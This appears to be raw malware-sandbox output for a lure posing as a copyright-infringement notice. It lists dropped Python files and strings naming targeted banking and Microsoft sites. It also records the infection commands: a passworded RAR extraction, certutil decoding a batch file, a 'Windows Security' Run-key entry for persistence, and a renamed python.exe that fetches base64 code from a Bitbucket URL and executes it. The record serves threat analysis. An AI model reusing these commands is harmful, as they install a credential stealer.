            Source: C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exeDropped PE file which has not been started: C:\Users\Public\QExvbmVOb25l\Lib\site-packages\win32\win32wnet.pydJump to dropped file
            Source: C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exeDropped PE file which has not been started: C:\Users\Public\QExvbmVOb25l\Lib\site-packages\Crypto\Hash\_BLAKE2s.pydJump to dropped file
            Source: C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exeDropped PE file which has not been started: C:\Users\Public\QExvbmVOb25l\Lib\site-packages\win32\win32crypt.pydJump to dropped file
            Source: C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exeDropped PE file which has not been started: C:\Users\Public\QExvbmVOb25l\Lib\site-packages\Crypto\Hash\_MD4.pydJump to dropped file
            Source: C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exeDropped PE file which has not been started: C:\Users\Public\QExvbmVOb25l\DLLs\_bz2.pydJump to dropped file
            Source: C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exeDropped PE file which has not been started: C:\Users\Public\QExvbmVOb25l\Lib\site-packages\Crypto\Hash\_SHA256.pydJump to dropped file
            Source: C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exeDropped PE file which has not been started: C:\Users\Public\QExvbmVOb25l\Lib\site-packages\Crypto\Hash\_MD5.pydJump to dropped file
            Source: C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exeDropped PE file which has not been started: C:\Users\Public\QExvbmVOb25l\Lib\site-packages\win32\win32console.pydJump to dropped file
            Source: C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exeDropped PE file which has not been started: C:\Users\Public\QExvbmVOb25l\Lib\site-packages\Crypto\Hash\_BLAKE2b.pydJump to dropped file
            Source: C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exeDropped PE file which has not been started: C:\Users\Public\QExvbmVOb25l\Lib\site-packages\win32\win32process.pydJump to dropped file
            Source: C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exeDropped PE file which has not been started: C:\Users\Public\QExvbmVOb25l\Lib\site-packages\win32\win32inet.pydJump to dropped file
            Source: C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exeDropped PE file which has not been started: C:\Users\Public\QExvbmVOb25l\Lib\site-packages\Crypto\Hash\_ghash_clmul.pydJump to dropped file
            Source: C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exeDropped PE file which has not been started: C:\Users\Public\QExvbmVOb25l\Lib\site-packages\win32\win32pipe.pydJump to dropped file
            Source: C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exeDropped PE file which has not been started: C:\Users\Public\QExvbmVOb25l\Lib\site-packages\win32\odbc.pydJump to dropped file
            Source: C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exeDropped PE file which has not been started: C:\Users\Public\QExvbmVOb25l\Lib\site-packages\win32\perfmon.pydJump to dropped file
            Source: C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exeDropped PE file which has not been started: C:\Users\Public\QExvbmVOb25l\Lib\site-packages\win32\win32clipboard.pydJump to dropped file
            Source: C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exeDropped PE file which has not been started: C:\Users\Public\QExvbmVOb25l\Lib\site-packages\win32\win32security.pydJump to dropped file
            Source: C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exeDropped PE file which has not been started: C:\Users\Public\QExvbmVOb25l\Lib\site-packages\win32comext\mapi\mapi.pydJump to dropped file
            Source: C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exeDropped PE file which has not been started: C:\Users\Public\QExvbmVOb25l\Lib\site-packages\pythonwin\mfc140u.dllJump to dropped file
            Source: C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exeDropped PE file which has not been started: C:\Users\Public\QExvbmVOb25l\Lib\site-packages\win32\win32transaction.pydJump to dropped file
            Source: C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exeDropped PE file which has not been started: C:\Users\Public\QExvbmVOb25l\DLLs\unicodedata.pydJump to dropped file
            Source: C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exeDropped PE file which has not been started: C:\Users\Public\QExvbmVOb25l\Lib\site-packages\Crypto\Hash\_SHA224.pydJump to dropped file
            Source: C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exeDropped PE file which has not been started: C:\Users\Public\QExvbmVOb25l\DLLs\_zoneinfo.pydJump to dropped file
            Source: C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exeDropped PE file which has not been started: C:\Users\Public\QExvbmVOb25l\Lib\site-packages\win32\pythonservice.exeJump to dropped file
            Source: C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exeDropped PE file which has not been started: C:\Users\Public\QExvbmVOb25l\Lib\site-packages\win32\win32help.pydJump to dropped file
            Source: C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exeDropped PE file which has not been started: C:\Users\Public\QExvbmVOb25l\Lib\site-packages\Crypto\Hash\_MD2.pydJump to dropped file
            Source: C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exeDropped PE file which has not been started: C:\Users\Public\QExvbmVOb25l\DLLs\pyexpat.pydJump to dropped file
            Source: C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exeDropped PE file which has not been started: C:\Users\Public\QExvbmVOb25l\DLLs\_overlapped.pydJump to dropped file
            Source: C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exeDropped PE file which has not been started: C:\Users\Public\QExvbmVOb25l\Lib\site-packages\Crypto\Util\_strxor.pydJump to dropped file
            Source: C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exeDropped PE file which has not been started: C:\Users\Public\QExvbmVOb25l\Lib\site-packages\win32\win32net.pydJump to dropped file
            Source: C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exeDropped PE file which has not been started: C:\Users\Public\QExvbmVOb25l\Lib\site-packages\win32comext\taskscheduler\taskscheduler.pydJump to dropped file
            Source: C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exeDropped PE file which has not been started: C:\Users\Public\QExvbmVOb25l\Lib\site-packages\win32\winxpgui.pydJump to dropped file
            Source: C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exeDropped PE file which has not been started: C:\Users\Public\QExvbmVOb25l\Lib\site-packages\isapi\PyISAPI_loader.dllJump to dropped file
            Source: C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exeDropped PE file which has not been started: C:\Users\Public\QExvbmVOb25l\Lib\site-packages\Crypto\Math\_modexp.pydJump to dropped file
            Source: C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exeDropped PE file which has not been started: C:\Users\Public\QExvbmVOb25l\Lib\site-packages\win32\win32pdh.pydJump to dropped file
            Source: C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exeDropped PE file which has not been started: C:\Users\Public\QExvbmVOb25l\DLLs\_lzma.pydJump to dropped file
            Source: C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exeDropped PE file which has not been started: C:\Users\Public\QExvbmVOb25l\Lib\site-packages\win32comext\propsys\propsys.pydJump to dropped file
            Source: C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exeDropped PE file which has not been started: C:\Users\Public\QExvbmVOb25l\Lib\site-packages\Crypto\Util\_cpuid_c.pydJump to dropped file
            Source: C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exeDropped PE file which has not been started: C:\Users\Public\QExvbmVOb25l\Lib\site-packages\win32\win32evtlog.pydJump to dropped file
            Source: C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exeDropped PE file which has not been started: C:\Users\Public\QExvbmVOb25l\Lib\site-packages\Crypto\PublicKey\_ed25519.pydJump to dropped file
            Source: C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exeDropped PE file which has not been started: C:\Users\Public\QExvbmVOb25l\Lib\site-packages\Crypto\PublicKey\_ec_ws.pydJump to dropped file
            Source: C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exeDropped PE file which has not been started: C:\Users\Public\QExvbmVOb25l\Lib\site-packages\win32\win32api.pydJump to dropped file
            Source: C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exeDropped PE file which has not been started: C:\Users\Public\QExvbmVOb25l\DLLs\_decimal.pydJump to dropped file
            Source: C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exeDropped PE file which has not been started: C:\Users\Public\QExvbmVOb25l\Lib\site-packages\win32\servicemanager.pydJump to dropped file
            Source: C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exeDropped PE file which has not been started: C:\Users\Public\QExvbmVOb25l\Lib\site-packages\pythonwin\Pythonwin.exeJump to dropped file
            Source: C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exeDropped PE file which has not been started: C:\Users\Public\QExvbmVOb25l\Lib\site-packages\win32\win32file.pydJump to dropped file
            Source: C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exeDropped PE file which has not been started: C:\Users\Public\QExvbmVOb25l\Lib\site-packages\win32\win32lz.pydJump to dropped file
            Source: C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exeDropped PE file which has not been started: C:\Users\Public\QExvbmVOb25l\Lib\site-packages\win32\win32event.pydJump to dropped file
            Source: C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exeDropped PE file which has not been started: C:\Users\Public\QExvbmVOb25l\Lib\site-packages\Crypto\Hash\_keccak.pydJump to dropped file
            Source: C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exeDropped PE file which has not been started: C:\Users\Public\QExvbmVOb25l\DLLs\_multiprocessing.pydJump to dropped file
            Source: C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exeDropped PE file which has not been started: C:\Users\Public\QExvbmVOb25l\DLLs\_ssl.pydJump to dropped file
            Source: C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exeDropped PE file which has not been started: C:\Users\Public\QExvbmVOb25l\DLLs\_sqlite3.pydJump to dropped file
            Source: C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exeDropped PE file which has not been started: C:\Users\Public\QExvbmVOb25l\Lib\site-packages\win32\win32trace.pydJump to dropped file
            Source: C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exeDropped PE file which has not been started: C:\Users\Public\QExvbmVOb25l\DLLs\_ctypes.pydJump to dropped file
            Source: C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exeDropped PE file which has not been started: C:\Users\Public\QExvbmVOb25l\Lib\site-packages\win32\win32service.pydJump to dropped file
            Source: C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exeDropped PE file which has not been started: C:\Users\Public\QExvbmVOb25l\Lib\site-packages\win32\win32profile.pydJump to dropped file
            Source: C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exeFile opened: C:\Users\Public\QExvbmVOb25l\Lib\site-packages\Crypto\Math\Primality.pyJump to behavior
            Source: C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exeFile opened: C:\Users\Public\QExvbmVOb25l\Lib\site-packages\Crypto\Math\_IntegerBase.pyiJump to behavior
            Source: C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exeFile opened: C:\Users\Public\QExvbmVOb25l\Lib\site-packages\Crypto\Math\Numbers.pyiJump to behavior
            Source: C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exeFile opened: C:\Users\Public\QExvbmVOb25l\Lib\site-packages\Crypto\Math\Numbers.pyJump to behavior
            Source: C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exeFile opened: C:\Users\Public\QExvbmVOb25l\Lib\site-packages\Crypto\Math\_IntegerBase.pyJump to behavior
            Source: C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exeFile opened: C:\Users\Public\QExvbmVOb25l\Lib\site-packages\Crypto\Math\Primality.pyiJump to behavior
            Source: synaptics.exe, 00000023.00000003.2318503117.0000000004574000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696584680t
            Source: synaptics.exe, 00000023.00000003.2318503117.0000000004574000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696584680
            Source: synaptics.exe, 00000023.00000003.2318503117.0000000004574000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696584680p
            Source: synaptics.exe, 00000023.00000003.2318503117.0000000004574000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696584680^
            Source: synaptics.exe, 00000023.00000003.2318503117.0000000004574000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696584680n
            Source: synaptics.exe, 00000023.00000003.2318503117.0000000004574000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696584680]
            Source: synaptics.exe, 00000023.00000003.2318503117.0000000004574000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696584680x
            Source: synaptics.exe, 00000023.00000003.2318503117.0000000004574000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696584680
            Source: synaptics.exe, 00000023.00000003.2318503117.0000000004574000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696584680s
            Source: synaptics.exe, 00000023.00000003.2318503117.0000000004574000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696584680|UE
            Source: synaptics.exe, 00000023.00000003.2318503117.0000000004574000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696584680x
            Source: synaptics.exe, 00000023.00000003.2318503117.0000000004574000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696584680u
            Source: synaptics.exe, 00000023.00000003.2318503117.0000000004574000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696584680
            Source: synaptics.exe, 00000023.00000003.2318503117.0000000004574000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696584680
            Source: synaptics.exe, 00000023.00000003.2318503117.0000000004574000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696584680}
            Source: synaptics.exe, 00000023.00000003.2318503117.0000000004574000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696584680x
            Source: synaptics.exe, 00000023.00000003.2318503117.0000000004574000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696584680t
            Source: synaptics.exe, 00000023.00000003.2318503117.0000000004574000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696584680
            Source: synaptics.exe, 00000023.00000003.2318503117.0000000004574000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696584680
            Source: synaptics.exe, 00000023.00000002.2481464700.0000000001FE5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlld}e
            Source: synaptics.exe, 00000023.00000003.2318503117.0000000004574000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696584680~
            Source: synaptics.exe, 00000023.00000003.2318503117.0000000004574000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696584680}
            Source: synaptics.exe, 00000023.00000003.2318503117.0000000004574000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696584680
            Source: synaptics.exe, 00000023.00000003.2318503117.0000000004574000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696584680h
            Source: synaptics.exe, 00000023.00000003.2318503117.0000000004574000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696584680
            Source: synaptics.exe, 00000023.00000003.2318503117.0000000004574000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696584680z
            Source: synaptics.exe, 00000023.00000003.2318503117.0000000004574000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696584680o
            Source: synaptics.exe, 00000023.00000003.2318503117.0000000004574000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696584680f
            Source: synaptics.exe, 00000023.00000003.2318503117.0000000004574000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696584680
            Source: synaptics.exe, 00000023.00000003.2318503117.0000000004574000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696584680
            Source: synaptics.exe, 00000023.00000003.2318503117.0000000004574000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696584680j
            Source: synaptics.exe, 00000023.00000003.2318503117.0000000004574000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696584680d
            Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess information queried: ProcessInformation
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe Rar x -pKPLbkjVZ5zAXUErg9hu3pw -inul -y QExvbmVOb25l.rar C:\Users\Public\QExvbmVOb25lJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\certutil.exe certutil -f -decode "C:\Users\Public\Windows Security.~b64" "C:\Users\Public\Windows Security.bat"Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Security" /t REG_SZ /d "C:\Windows\Explorer.EXE C:\Users\Public\Windows Security.bat" /fJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\Public\QExvbmVOb25l\synaptics.exe "C:\Users\Public\QExvbmVOb25l\synaptics.exe" -c "import urllib.request;import base64;exec(base64.b64decode(urllib.request.urlopen('https://bitbucket.org/lonenone111/adonis/raw/5b1ff3245e798c426de8b88f375b93334fbb254a/Adonis_All').read().decode('utf-8')))"Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal..pdf"Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\Public\QExvbmVOb25l\synaptics.exe "c:\users\public\qexvbmvob25l\synaptics.exe" -c "import urllib.request;import base64;exec(base64.b64decode(urllib.request.urlopen('https://bitbucket.org/lonenone111/adonis/raw/5b1ff3245e798c426de8b88f375b93334fbb254a/adonis_all').read().decode('utf-8')))"
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\Public\QExvbmVOb25l\synaptics.exe "c:\users\public\qexvbmvob25l\synaptics.exe" -c "import urllib.request;import base64;exec(base64.b64decode(urllib.request.urlopen('https://bitbucket.org/lonenone111/adonis/raw/5b1ff3245e798c426de8b88f375b93334fbb254a/adonis_all').read().decode('utf-8')))"Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\DLLs VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\DLLs VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib\encodings\__init__.py VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib\encodings\__init__.py VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib\encodings\__init__.py VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib\encodings\__init__.py VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib\encodings\__init__.py VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib\encodings VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib\encodings\__pycache__\__init__.cpython-310.pyc.26935328 VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\DLLs VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib\codecs.py VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib\codecs.py VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib\codecs.py VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib\codecs.py VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib\codecs.py VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib\__pycache__\codecs.cpython-310.pyc.26393920 VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib\encodings VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib\encodings VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib\encodings VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib\encodings\aliases.py VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib\encodings\aliases.py VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib\encodings\aliases.py VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib\encodings\aliases.py VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib\encodings\aliases.py VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib\encodings\__pycache__ VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib\encodings\__pycache__\aliases.cpython-310.pyc.26937200 VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib\encodings VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib\encodings\utf_8.py VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib\encodings\utf_8.py VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib\encodings\utf_8.py VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib\encodings\utf_8.py VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib\encodings\utf_8.py VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib\encodings\__pycache__ VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib\encodings\__pycache__\utf_8.cpython-310.pyc.26937200 VolumeInformation
            Source: C:\Users\Public\QExvbmVOb25l\synaptics.exeQueries volume information: C:\Users\Public\QExvbmVOb25l\Lib\encodings VolumeInformation
